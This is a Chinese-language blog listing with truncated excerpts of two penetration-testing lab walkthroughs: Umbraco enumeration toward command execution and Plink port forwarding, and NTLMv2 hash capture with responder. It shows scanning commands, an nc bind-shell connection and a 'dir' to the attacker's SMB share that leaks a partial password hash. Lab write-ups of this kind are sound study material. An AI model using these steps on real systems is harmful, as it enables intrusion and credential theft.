發表文章

目前顯示的是有「nc」標籤的文章

Windows 連接埠轉發 - Plink

圖片
 Windows 連接埠轉發 - Plink 儘管現在的 Windows 已經預設內建 SSH.exe,但實際環境中很多管理者會限制甚至移除 這時候尋求 PUTTY.exe 或是 PLINK 是另外一種好用的工具 環境說明,目標 Windows 對外僅有開放 Web Service 80 Port 第一步,透過 Web Service 入侵建立 Interactive Shell 攻擊機 192.168.45.160 靶機 192.168.201.64 rustscan 後,靶機對外僅有 80 Port gobuster 看看入侵點吧 └─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/ -t 150 -x .aspx 結果跳 Error : http://192.168.201.64/f606e083-b7c0-4b32-9a46-bcd18b686e9d => 200 (Length: 1917). To continue please exclude the status code or the length 那就 ignore 該 length 繼續,└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/ -t 150 -x .aspx --exclude-length 1917 沒掃到可利用的 網站有個子路徑 /umbraco gobuster 加上子路徑再掃看看 └─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/umbraco -t 150 -x .aspx                        掃完發現有個可以直接利用的 forms.aspx,可以直接下 command 之前有學過可以直接利用 powercat.ps1,powercat.ps1 查找與複製到 HTTP Server 根目錄 指...

NET-NTLMv2 密碼破解

圖片
 NET-NTLMv2 密碼破解 靶機 IP : 192.168.197.211 第一步 rustscan,└─$ rustscan -a 192.168.197.211 --scripts none --ulimit 500 135、139、445、3389、4444、5555、5985、47001、etc... nmap 列舉這幾個 Port,└─$ sudo nmap -sV -sC -p 135,139,445,3389,4444,5555,5985 192.168.197.211 上圖可以看到有一個 4444 Port 是 krb524,透過 nc 直接連接時發現可以直接拿到 shell 這是因為有一個假設的前提,前提是我們已經有透過 paul 帳號初步滲透並在對方的 4444 Port 上綁定了 Remote Shell,所以此時才能直接使用 nc 進行 remote shell 連接 執行 ipconfig 確認是該台機器的 shell,whoami 查看使用者是 paul 透過 net user paul 查看使用者的進一步資訊,僅隸屬於遠端桌面群組 在我們的攻擊機上執行 ip a 查看相關 Interface 介面與資訊,我們需要的是 tun0 這個介面 192.168.45.228 是我們攻擊機的與靶機有路由的介面 IP 執行 └─$ sudo responder -I tun0,於介面 tun0 上啟動 responder 監聽,接下來主要要透過 SMB 這個服務來監聽所有傳入的驗證,確認 SMB 服務在 responder 是 ON 的狀態 接下來從剛剛的 remote shell 執行 dir \\192.168.45.228\test,可以看到存取失敗 在 responder 服務上可以看到從靶機傳過來的驗證,使用者是 FILES01\paul,密碼是雜湊如下 paul::FILES01:f9d057cea7136add:883BA6449490AD7910962CEDAF7DA112:01010000000000008017673550EBD901F4031B80844971500000000002000800310050003500500001001E00570049004E002D00370037005A0044003500...